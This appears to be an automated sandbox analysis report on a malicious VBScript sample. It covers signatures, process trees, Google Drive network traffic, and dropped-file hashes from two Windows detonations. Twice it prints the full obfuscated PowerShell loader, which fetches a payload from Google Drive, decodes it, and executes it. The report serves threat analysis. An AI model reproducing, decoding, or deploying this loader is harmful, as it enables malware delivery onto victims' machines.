Malware Analysis Report

2025-08-10 21:50

Sample ID 240608-h4654sba89
Target 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs
SHA256 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d
Tags
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d

Threat Level: Likely malicious

The file 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs was found to be: Likely malicious.

Malicious Activity Summary


Blocklisted process makes network request

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-08 07:18

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-08 07:18

Reported

2024-06-08 07:21

Platform

win7-20240508-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Lgknoldet = 1;Function Berringsfladen190($Scratchcard){$Coil=$Scratchcard.Length-$Lgknoldet;$Kodfoderets='Substring';For( $gadebilledet=7;$gadebilledet -lt $Coil;$gadebilledet+=8){$Underargue+=$Scratchcard.$Kodfoderets.Invoke( $gadebilledet, $Lgknoldet);}$Underargue;}function Forlyder($Climata11){ & ($Spatten) ($Climata11);}$benzimidazole=Berringsfladen190 'At,osfrMOsteopeoWheelabzIconveriAnnicaslSquiffilUndisciaSyninge/ Militr5Autobah.R.educa0Nonrege Untast.(ArbejdsWKonsti i UnderlnapiolindThermogoSvensknwPhototusKelpi,g TwofersNNudni.kTEntreat aianis1 Ari.rs0Aminotr. Heglin0Ostraci;Reguler FenolerWBestredi OpremsnBredspe6Kandi,a4Ba depl;Salater TilflyxDirecto6Profite4Hyperfo; Curumi Cam,hacrbrndborvPluri.o:Smit et1Uvaerd 2Undergr1Omlbets.Snitvrk0Phenoge)rgsjler KonsumpG bi.dsee EthanocIlluderk Embo,co Re.ren/Sarcorh2B,edsaa0 Lemmed1Osmousa0Karskca0Teknolo1.nitsel0Fagvide1Enbran, DelthedFtro,ekliM,crospr.iggyslechalanafLeukemio UdpegexM ckere/Klockma1Justtre2l,njefa1Renerne.Unmecha0Sa mens ';$Tirve=Berringsfladen190 'ImpoverUTandlgesMyelineeslickinrReempha- AngepiA BerusegOpinioneEksisten infinitEskimol ';$hawklike=Berringsfladen190 'PaneulohPrinzhot lar.ertDaavildp Si.onisSam.and:Pict.an/Lystopf/outw.rkdFastholrBrut.oiiGestikuvPhocenie Deir r.Huchof,gdissei,oUnbarspo.icondygHalvkuglKlvedese Firepl.Afnati.c IntranoPruditym,pasmol/T.letaduruf sitcSvmmela?Discrete ArchpaxClinoc pTr adreoPatri.trStemmeptF rulem=Asplenidneighboo,dscripw pill anGallardlatomythotautoloaProx,mod Beeroc&D,llerii ChoribdForbrnd=Ostraco1FyrmestRStaminaRSplurgigReprovip Echino_Centr,fRBrnelrdz Rvrdig2Enceph,yClothotpSuitlikiOculonaJforbrydcStreget0Kyphosi0 ,radusN Pi,udipOceanisuFuturisZ T,ille4goo nesPChaperot gyrome-MateriaiAabenbaw Stnned9WellermvMinimumjDeserteKSektion2 Nonmet7Ganglio2grundta ';$Galliwasp=Berringsfladen190 ' Cumbro>Noncura ';$Spatten=Berringsfladen190 'cylindeiAntisipespionsax Lkkers ';$Cestos='Plsebar';$Uncastle = Berringsfladen190 'Skrukh.eVarebetc BoremahResorbeoRebuoya Dobbel%GuldaldaRebunchpUnglac pInstrumd Dent,iaNonsenst Slavd,a .akers% Uncarn\rovsingkKassea r Phyl.oe DammusdT larigiUnraptutCurvulatDonkeyke F somhnInterd,.LeatherN estlndoFunnellnudstykn Tanksta&indenri&populat Sk,vrigeFixearbcUnaturehDespotioRedisti SiegeabtHyleton ';Forlyder (Berringsfladen190 'Minxshi$kazaktagperspe l Yi,esao ellw nbMentoriaMaintailweather:GetatabBGrat,iteFalsknekAl,rinslSt,diecaResign gSluknineForeloulJoniseriJant.rsg HandedeFolkedor Ringvee comedis Angleb=Lsepult(Codesigc Forligm asturtdW.ndfla Coilyea/Wal,mancMilieur unmole$AndensiUOverfornStn,etsc GratisaForv klsArteriotDiphtholSeriocoeVampyr )Imm nas ');Forlyder (Berringsfladen190 'Ekst.at$t,kstmag BalloolTahinamoVan,alibAlgeaspaSusendel Bortad:,iatomeBgaspistuFun.ametValfar.y OutgoilMilitrnaEl.ktrimLiljekoi,ignalbnForbruseDisprop=gy,ospo$VelopdrhefterkraSeksogtwDirekt.kYaqo,aslKradsemiOrd einkSeptleveAscidio.Maaltids UnriskpCoveraglHusstaniEnergimtV,dired(Vlverhu$SprngkrGclo steaArno.islMurmurelGalosheiE fektiwSyskedaa SentimsBancosrpWeelvir)Hemolym ');$hawklike=$Butylamine[0];$Icterine= (Berringsfladen190 'Lysesta$ Unp,esgMisapprlLygtem,oCliquisb ParqueaSuppegrlWooersv:F.rbldtBti,guytrStreli nPallidieSpo,tedsReturneaUndisseaLiv,lanrBortled=Lich opN Celeb,eKalve,rw E,char-Pa,asubOHoverenbHerbagej.ilburseNonpondc U urdet Regara CeilingSCalibrayBreechlsLutianitMancheseCertifimOvulist.Homoc.nNS ldiereO.cultitRa,atou.D.ppelkWHeltindeOutpoisbTruistiCPa,tsuil R,bbiniDyr.naveAk,iespnSelektit');$Icterine+=$Beklageligeres[1];Forlyder ($Icterine);Forlyder (Berringsfladen190 ' Sundhe$ Besku BKampk,ar DopplenPoncedneSjlelivs Khahooa,orestia RigborrUnf.rio.WortworH Fritage MonograDemiss.dkonsumeeHelbredr deconcsDru.maa[Rodkno.$TeleskoTSpk.uggi Unn tirArtillevCoronateCurs,re] Rea,ti=Reperso$AsketerbMiljpaaeBeboelsnbamboozzHal.geniyerkednmPsammopiIndividd commena Lemlstz.ackeysoKildeskl ynenefe Opslmm ');$Vicontiels=Berringsfladen190 ' Cult v$PaginerB Eve,tyrUr,nomenAfgangseRibningsMu icataBesgactaCognat rGenicul.PorphyrDBilandeoargumenwMac.otonEfterralTollek osmlehovaOvervind OversiFTv vlraiTeledenlLeikafoeBitterb(titulad$Data.ash NuleneaEscandawKphjestkLeukstrl Daughti Ug.kork arbuckeRegnska,Galgenf$ AfdampP Uhllost ashpeeeRiddamprAepost oseismomsBrandfapIndsk.ieLedelinr Ejend.mTrffedeo aestrouGalmandswurleyp)Unfavou ';$Pterospermous=$Beklageligeres[0];Forlyder (Berringsfladen190 ' Flyv,r$Plu,aligKompenslA elopro ThreepbGa.tritaKontoralBlommes: Heli.pOOpskrtekOneirosknotkerieFrihederGaneftrn,arkanteAttaindsSpkhugg1Velaryd9Spisefr8Skybru =Amatrni(AnretteTPlisseee MglingsWeirdybtTheoris-kemikalPDeplaneaWackymutSsonerchSrtilfl Noshers$DagtjenPTvivllstAlcaic,eElessarrhaandhvoUdsk.ftsAfstivepUnderekeOpinionrUanseelmcalycoioDelfiunu NidifisVirksom)Pal,ada ');while (!$Okkernes198) {Forlyder (Berringsfladen190 'Roseola$T.lkebigBkke,belOpslideoFa vetabH lverea Trfsikl Becree: rigsrVTakkeklvExtillveTweedjar oliedriStk.ingsFidd eb=Slutdis$PrognostimmoralrFaint su Dis,oneAnissma ') ;Forlyder $Vicontiels;Forlyder (Berringsfladen190 ' Chond.SRet eadtAmm.nitaNondemarMaa,edstSteekin-MarmoreSnetstrmlR,jsebeeTelephoeUnpeacepStr,gsr Bryllup4fire,ar ');Forlyder (Berringsfladen190 'Fo.efal$SporinggMouthp lDdedansoNoexfrdb oughesa nstabil Dephlo: FormueO.panagekEpiz,oakHeweunpe agustircapitulnNonferoeVindikas Karrie1 cciput9Aa.esky8elletre=Adulter(Afsy inTRevivale Ciconis otaltetBumleno-DemagniPPleurocaCorriget.aandudhFrstesa ,linkfy$BrneforPBecommatPlatteneHungerlrSalgssto BortsasFoliernpSindelae ContemrPreheatmZollsuboDicho,duKod ficsproblem)Mink.ar ') ;Forlyder (Berringsfladen190 'Oliefar$Konc rngAnaly.el GlyoxyoRaf.inebDisq,isaZoransbl Arguit:KulturmPOrthoceuVerden,sWigletstEdsformeCaloricrKolonneuDe.elecm FortepmVemo.sse,nlagemnCha,emoe Dimiss=Phellog$NotochogSocketll,ndespooVammelhbBrakvanaByggemylStoette:Kolokv.eEjendomxNonulcecPebbleha undervvRaakremaCrookintSre ebaeDeskr,ps Unfatt+Avenuer+Steffis% Sku.ri$Joypop.BChokolauM.tvasktPriorizyLigaturlMagnascaEarscremStratociFrimeninS.hverteTwe vem.WanglincTruttacoweaseleu.udipednSe,vanttKa.eand ') ;$hawklike=$Butylamine[$Pusterummene];}$unentrapped=293328;$Zooplasty177=30076;Forlyder (Berringsfladen190 'Espe,an$ SelskagSt.gsejlTacheomoSemiquibActuariarecrushl fisker:RelishiAKompromgSemostogCircumfrG,noesee Ensilag,yppelsaB holdntMultisoeKejserptUdkaarisEt.onom Mor,inb=Outbrag TindingGGlycopeeLvs.ovetassurer-EineborC Mol,bdoOptrkkenunl.beltPyrenoieGrskepen Gyrinit F lker Uncolor$ Gluep PFo.dumstEgalitee EmissirScaremoodesertes UnderdpbeadroleComputeropercu mFugtigkoSjllanduColyticsPa idae ');Forlyder (Berringsfladen190 'Enaptse$CurranagPonyerslSlutbetoShoddywbCapsuliaNervulolGospel.: Bur.auR Dysleke O alizlHomotraeSaltiesgGymnasieAshramsrEidologi TuparanFotocelg Sorthae E.odfirScutchen Keelmae RenummsAngrebs Roekamp= Syg.jo Ahoycri[SuperesSUdtagetyLanier,sResprintAirbruseNavle,em Spor.e.Propo,tCEnamou oKonkurrnNeo.acivGladsakeSv,dekurUskoksntproinve]Refinis:Trowser:TaenkteFSerb rarEk pedeoNonellimMiswaytBSa menbaEntredesUnintereSaunder6Aminosy4 ReeshiSCarcinotdukkevorDiptycaiZind.senHelautogStrenge(Grovvar$ MethodAkassablgJackersg EventurShockineAnimistgTrini raBehov.ntPrereveeSlagt,ft LollypsBillige) Predic ');Forlyder (Berringsfladen190 ' Pa til$Dy frosgDesorbel RechaloFortrngbL idensaslavehal,astril:MutismpPSamhrigr ReciviaAfholdei holines C relleBeedigerInd,ere Forhold=Superw pehohom[.earlssSDeci.esybsseninsDiscerpt ybstegeModstanmE.ratum.RestrikT InexoreH,lgenex Sc,phatSpouseh. sningeEBnd llanLejdesacO,erridoFamlesfdDicingoi Thiochn GigologDunamsd] Sp,nta:Stor.ed:KorrigaAFa veglSMill onCRkkeflgI ,ricotIFl essa.ChromomG .ipskgeSorglstt PseudoSBal.egntDmning.rThistediGi.bettnKonsummgrekapit(Trumfst$HudsoniRToys,meeCheesemlRetorsie TransmgKunstmaeBlegso rMetazoai DublednAdvocatgPudderne KnackerFlerdobnWiener,eNiaisgusNo,syll) Bitsto ');Forlyder (Berringsfladen190 'Searcha$Teori.ngrattrailMavercao Unmustb StorfaaSonicatl Decolo: LancerACa,pfirsIltningk Stabile ImpenetSlalomeeUnoilgrn.apperl=un rook$DansetrPFlabederstabelvaRodeoeni ,rydefsretfrd eTaranchrDrif.sp.TopkicksAdhib.tuBe,ryprbGenindssAffronttPiperylrSort.meiindissonLagringgApathi,(No.comp$ThessaluMonostenVeerufyeLaasesmnBescurft Loathsr,uldbryaOperaerpdiskenspVenialieBocher.dTatt dd,Stillin$ReappliZGevreruoslutt dodefencepuretms.l.onsellaMenufilsCataclytTote.ply.erolig1Spidsmu7Mrkelig7Bouillo)Que.ule ');Forlyder $Asketen;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kreditten.Non && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
FR 142.250.179.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
FR 172.217.20.161:443 drive.usercontent.google.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt

MD5 36113f68a185488c2fbe2bfcf34bcfdc
SHA1 3e702a1bda44d41c8fad9ad56039be843c9a0706
SHA256 fb796fb121a29aed4ca01f2cce8d3b59b70afd4978cbecd25625c2c45812e233
SHA512 96bd9b00e3a3a6dc789bbb5414206e826b412596c39044b6c8e5d4a8624d49b75a991714858fa7c7d4bd5864cca82473eb311ef08d2fbddc33e1f7ff3f1ade45

memory/464-328-0x000007FEF5F1E000-0x000007FEF5F1F000-memory.dmp

memory/464-329-0x000000001B650000-0x000000001B932000-memory.dmp

memory/464-330-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

memory/464-331-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

memory/464-332-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

memory/464-335-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-08 07:18

Reported

2024-06-08 07:21

Platform

win10v2004-20240426-en

Max time kernel

94s

Max time network

95s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Lgknoldet = 1;Function Berringsfladen190($Scratchcard){$Coil=$Scratchcard.Length-$Lgknoldet;$Kodfoderets='Substring';For( $gadebilledet=7;$gadebilledet -lt $Coil;$gadebilledet+=8){$Underargue+=$Scratchcard.$Kodfoderets.Invoke( $gadebilledet, $Lgknoldet);}$Underargue;}function Forlyder($Climata11){ & ($Spatten) ($Climata11);}$benzimidazole=Berringsfladen190 'At,osfrMOsteopeoWheelabzIconveriAnnicaslSquiffilUndisciaSyninge/ Militr5Autobah.R.educa0Nonrege Untast.(ArbejdsWKonsti i UnderlnapiolindThermogoSvensknwPhototusKelpi,g TwofersNNudni.kTEntreat aianis1 Ari.rs0Aminotr. Heglin0Ostraci;Reguler FenolerWBestredi OpremsnBredspe6Kandi,a4Ba depl;Salater TilflyxDirecto6Profite4Hyperfo; Curumi Cam,hacrbrndborvPluri.o:Smit et1Uvaerd 2Undergr1Omlbets.Snitvrk0Phenoge)rgsjler KonsumpG bi.dsee EthanocIlluderk Embo,co Re.ren/Sarcorh2B,edsaa0 Lemmed1Osmousa0Karskca0Teknolo1.nitsel0Fagvide1Enbran, DelthedFtro,ekliM,crospr.iggyslechalanafLeukemio UdpegexM ckere/Klockma1Justtre2l,njefa1Renerne.Unmecha0Sa mens ';$Tirve=Berringsfladen190 'ImpoverUTandlgesMyelineeslickinrReempha- AngepiA BerusegOpinioneEksisten infinitEskimol ';$hawklike=Berringsfladen190 'PaneulohPrinzhot lar.ertDaavildp Si.onisSam.and:Pict.an/Lystopf/outw.rkdFastholrBrut.oiiGestikuvPhocenie Deir r.Huchof,gdissei,oUnbarspo.icondygHalvkuglKlvedese Firepl.Afnati.c IntranoPruditym,pasmol/T.letaduruf sitcSvmmela?Discrete ArchpaxClinoc pTr adreoPatri.trStemmeptF rulem=Asplenidneighboo,dscripw pill anGallardlatomythotautoloaProx,mod Beeroc&D,llerii ChoribdForbrnd=Ostraco1FyrmestRStaminaRSplurgigReprovip Echino_Centr,fRBrnelrdz Rvrdig2Enceph,yClothotpSuitlikiOculonaJforbrydcStreget0Kyphosi0 ,radusN Pi,udipOceanisuFuturisZ T,ille4goo nesPChaperot gyrome-MateriaiAabenbaw Stnned9WellermvMinimumjDeserteKSektion2 Nonmet7Ganglio2grundta ';$Galliwasp=Berringsfladen190 ' Cumbro>Noncura ';$Spatten=Berringsfladen190 'cylindeiAntisipespionsax Lkkers ';$Cestos='Plsebar';$Uncastle = Berringsfladen190 'Skrukh.eVarebetc BoremahResorbeoRebuoya Dobbel%GuldaldaRebunchpUnglac pInstrumd Dent,iaNonsenst Slavd,a .akers% Uncarn\rovsingkKassea r Phyl.oe DammusdT larigiUnraptutCurvulatDonkeyke F somhnInterd,.LeatherN estlndoFunnellnudstykn Tanksta&indenri&populat Sk,vrigeFixearbcUnaturehDespotioRedisti SiegeabtHyleton ';Forlyder (Berringsfladen190 'Minxshi$kazaktagperspe l Yi,esao ellw nbMentoriaMaintailweather:GetatabBGrat,iteFalsknekAl,rinslSt,diecaResign gSluknineForeloulJoniseriJant.rsg HandedeFolkedor Ringvee comedis Angleb=Lsepult(Codesigc Forligm asturtdW.ndfla Coilyea/Wal,mancMilieur unmole$AndensiUOverfornStn,etsc GratisaForv klsArteriotDiphtholSeriocoeVampyr )Imm nas ');Forlyder (Berringsfladen190 'Ekst.at$t,kstmag BalloolTahinamoVan,alibAlgeaspaSusendel Bortad:,iatomeBgaspistuFun.ametValfar.y OutgoilMilitrnaEl.ktrimLiljekoi,ignalbnForbruseDisprop=gy,ospo$VelopdrhefterkraSeksogtwDirekt.kYaqo,aslKradsemiOrd einkSeptleveAscidio.Maaltids UnriskpCoveraglHusstaniEnergimtV,dired(Vlverhu$SprngkrGclo steaArno.islMurmurelGalosheiE fektiwSyskedaa SentimsBancosrpWeelvir)Hemolym ');$hawklike=$Butylamine[0];$Icterine= (Berringsfladen190 'Lysesta$ Unp,esgMisapprlLygtem,oCliquisb ParqueaSuppegrlWooersv:F.rbldtBti,guytrStreli nPallidieSpo,tedsReturneaUndisseaLiv,lanrBortled=Lich opN Celeb,eKalve,rw E,char-Pa,asubOHoverenbHerbagej.ilburseNonpondc U urdet Regara CeilingSCalibrayBreechlsLutianitMancheseCertifimOvulist.Homoc.nNS ldiereO.cultitRa,atou.D.ppelkWHeltindeOutpoisbTruistiCPa,tsuil R,bbiniDyr.naveAk,iespnSelektit');$Icterine+=$Beklageligeres[1];Forlyder ($Icterine);Forlyder (Berringsfladen190 ' Sundhe$ Besku BKampk,ar DopplenPoncedneSjlelivs Khahooa,orestia RigborrUnf.rio.WortworH Fritage MonograDemiss.dkonsumeeHelbredr deconcsDru.maa[Rodkno.$TeleskoTSpk.uggi Unn tirArtillevCoronateCurs,re] Rea,ti=Reperso$AsketerbMiljpaaeBeboelsnbamboozzHal.geniyerkednmPsammopiIndividd commena Lemlstz.ackeysoKildeskl ynenefe Opslmm ');$Vicontiels=Berringsfladen190 ' Cult v$PaginerB Eve,tyrUr,nomenAfgangseRibningsMu icataBesgactaCognat rGenicul.PorphyrDBilandeoargumenwMac.otonEfterralTollek osmlehovaOvervind OversiFTv vlraiTeledenlLeikafoeBitterb(titulad$Data.ash NuleneaEscandawKphjestkLeukstrl Daughti Ug.kork arbuckeRegnska,Galgenf$ AfdampP Uhllost ashpeeeRiddamprAepost oseismomsBrandfapIndsk.ieLedelinr Ejend.mTrffedeo aestrouGalmandswurleyp)Unfavou ';$Pterospermous=$Beklageligeres[0];Forlyder (Berringsfladen190 ' Flyv,r$Plu,aligKompenslA elopro ThreepbGa.tritaKontoralBlommes: Heli.pOOpskrtekOneirosknotkerieFrihederGaneftrn,arkanteAttaindsSpkhugg1Velaryd9Spisefr8Skybru =Amatrni(AnretteTPlisseee MglingsWeirdybtTheoris-kemikalPDeplaneaWackymutSsonerchSrtilfl Noshers$DagtjenPTvivllstAlcaic,eElessarrhaandhvoUdsk.ftsAfstivepUnderekeOpinionrUanseelmcalycoioDelfiunu NidifisVirksom)Pal,ada ');while (!$Okkernes198) {Forlyder (Berringsfladen190 'Roseola$T.lkebigBkke,belOpslideoFa vetabH lverea Trfsikl Becree: rigsrVTakkeklvExtillveTweedjar oliedriStk.ingsFidd eb=Slutdis$PrognostimmoralrFaint su Dis,oneAnissma ') ;Forlyder $Vicontiels;Forlyder (Berringsfladen190 ' Chond.SRet eadtAmm.nitaNondemarMaa,edstSteekin-MarmoreSnetstrmlR,jsebeeTelephoeUnpeacepStr,gsr Bryllup4fire,ar ');Forlyder (Berringsfladen190 'Fo.efal$SporinggMouthp lDdedansoNoexfrdb oughesa nstabil Dephlo: FormueO.panagekEpiz,oakHeweunpe agustircapitulnNonferoeVindikas Karrie1 cciput9Aa.esky8elletre=Adulter(Afsy inTRevivale Ciconis otaltetBumleno-DemagniPPleurocaCorriget.aandudhFrstesa ,linkfy$BrneforPBecommatPlatteneHungerlrSalgssto BortsasFoliernpSindelae ContemrPreheatmZollsuboDicho,duKod ficsproblem)Mink.ar ') ;Forlyder (Berringsfladen190 'Oliefar$Konc rngAnaly.el GlyoxyoRaf.inebDisq,isaZoransbl Arguit:KulturmPOrthoceuVerden,sWigletstEdsformeCaloricrKolonneuDe.elecm FortepmVemo.sse,nlagemnCha,emoe Dimiss=Phellog$NotochogSocketll,ndespooVammelhbBrakvanaByggemylStoette:Kolokv.eEjendomxNonulcecPebbleha undervvRaakremaCrookintSre ebaeDeskr,ps Unfatt+Avenuer+Steffis% Sku.ri$Joypop.BChokolauM.tvasktPriorizyLigaturlMagnascaEarscremStratociFrimeninS.hverteTwe vem.WanglincTruttacoweaseleu.udipednSe,vanttKa.eand ') ;$hawklike=$Butylamine[$Pusterummene];}$unentrapped=293328;$Zooplasty177=30076;Forlyder (Berringsfladen190 'Espe,an$ SelskagSt.gsejlTacheomoSemiquibActuariarecrushl fisker:RelishiAKompromgSemostogCircumfrG,noesee Ensilag,yppelsaB holdntMultisoeKejserptUdkaarisEt.onom Mor,inb=Outbrag TindingGGlycopeeLvs.ovetassurer-EineborC Mol,bdoOptrkkenunl.beltPyrenoieGrskepen Gyrinit F lker Uncolor$ Gluep PFo.dumstEgalitee EmissirScaremoodesertes UnderdpbeadroleComputeropercu mFugtigkoSjllanduColyticsPa idae ');Forlyder (Berringsfladen190 'Enaptse$CurranagPonyerslSlutbetoShoddywbCapsuliaNervulolGospel.: Bur.auR Dysleke O alizlHomotraeSaltiesgGymnasieAshramsrEidologi TuparanFotocelg Sorthae E.odfirScutchen Keelmae RenummsAngrebs Roekamp= Syg.jo Ahoycri[SuperesSUdtagetyLanier,sResprintAirbruseNavle,em Spor.e.Propo,tCEnamou oKonkurrnNeo.acivGladsakeSv,dekurUskoksntproinve]Refinis:Trowser:TaenkteFSerb rarEk pedeoNonellimMiswaytBSa menbaEntredesUnintereSaunder6Aminosy4 ReeshiSCarcinotdukkevorDiptycaiZind.senHelautogStrenge(Grovvar$ MethodAkassablgJackersg EventurShockineAnimistgTrini raBehov.ntPrereveeSlagt,ft LollypsBillige) Predic ');Forlyder (Berringsfladen190 ' Pa til$Dy frosgDesorbel RechaloFortrngbL idensaslavehal,astril:MutismpPSamhrigr ReciviaAfholdei holines C relleBeedigerInd,ere Forhold=Superw pehohom[.earlssSDeci.esybsseninsDiscerpt ybstegeModstanmE.ratum.RestrikT InexoreH,lgenex Sc,phatSpouseh. sningeEBnd llanLejdesacO,erridoFamlesfdDicingoi Thiochn GigologDunamsd] Sp,nta:Stor.ed:KorrigaAFa veglSMill onCRkkeflgI ,ricotIFl essa.ChromomG .ipskgeSorglstt PseudoSBal.egntDmning.rThistediGi.bettnKonsummgrekapit(Trumfst$HudsoniRToys,meeCheesemlRetorsie TransmgKunstmaeBlegso rMetazoai DublednAdvocatgPudderne KnackerFlerdobnWiener,eNiaisgusNo,syll) Bitsto ');Forlyder (Berringsfladen190 'Searcha$Teori.ngrattrailMavercao Unmustb StorfaaSonicatl Decolo: LancerACa,pfirsIltningk Stabile ImpenetSlalomeeUnoilgrn.apperl=un rook$DansetrPFlabederstabelvaRodeoeni ,rydefsretfrd eTaranchrDrif.sp.TopkicksAdhib.tuBe,ryprbGenindssAffronttPiperylrSort.meiindissonLagringgApathi,(No.comp$ThessaluMonostenVeerufyeLaasesmnBescurft Loathsr,uldbryaOperaerpdiskenspVenialieBocher.dTatt dd,Stillin$ReappliZGevreruoslutt dodefencepuretms.l.onsellaMenufilsCataclytTote.ply.erolig1Spidsmu7Mrkelig7Bouillo)Que.ule ');Forlyder $Asketen;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kreditten.Non && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
FR 142.250.179.78:443 drive.google.com tcp
US 8.8.8.8:53 78.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 drive.usercontent.google.com udp
FR 172.217.20.161:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 161.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt

MD5 290fae52f17dbaeec503dfb5d085abff
SHA1 fdae242a21f6383d0d5aab98f1bf1f3768d833b6
SHA256 d2390d6c0c3ba3ae1422d582888dcadcb05c387567e3000eb148da64aeb364e9
SHA512 7f6d352a85b7fb6c5f5d5d2d76bd081a525ff941b28f481d166a054dbbdcbe0aa4640ea6eb31b226d59f94a4cd5a549df9f041880e481ff397294a048a7a280b

C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt

MD5 e3c54d10d7b28f4437e5082454a22cb7
SHA1 f5d6c9ff3d8bebf64c7a03416e005aea2f72f82e
SHA256 4641feef049099ee8406644631ffb5a83d07c631c29f15490824d649c52c868b
SHA512 f26f744f344c692551d23f0d8281f27bd2bd6de2263b89c1642f3196ac90c28337019e5d47e9b88cf2e607b5a3e70f3c30f9ee94fb9fae43b4f3a351cd309fc6

C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt

MD5 b98730add3fdac807aa8a524679c31c7
SHA1 0027f4bf52d43ea2aaee06a78c4dca190799e5f9
SHA256 8a6d3e18638460134e0ca1020b5d2ed00246327d28516b7181423e6a16ebeeed
SHA512 546bc8b8b3dd9d6f5a870794ad38b30ff0e052be9d00b3e5d6e35a8ca417970b86456e39d1bc6a5fb652b4d9b5765d3b47fc43033a0a151db9791df64b0b92d3

memory/4808-311-0x00007FFBFE473000-0x00007FFBFE475000-memory.dmp

memory/4808-313-0x0000026BB38B0000-0x0000026BB38D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z3j3x4tj.eds.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4808-322-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp

memory/4808-323-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp

memory/4808-326-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp

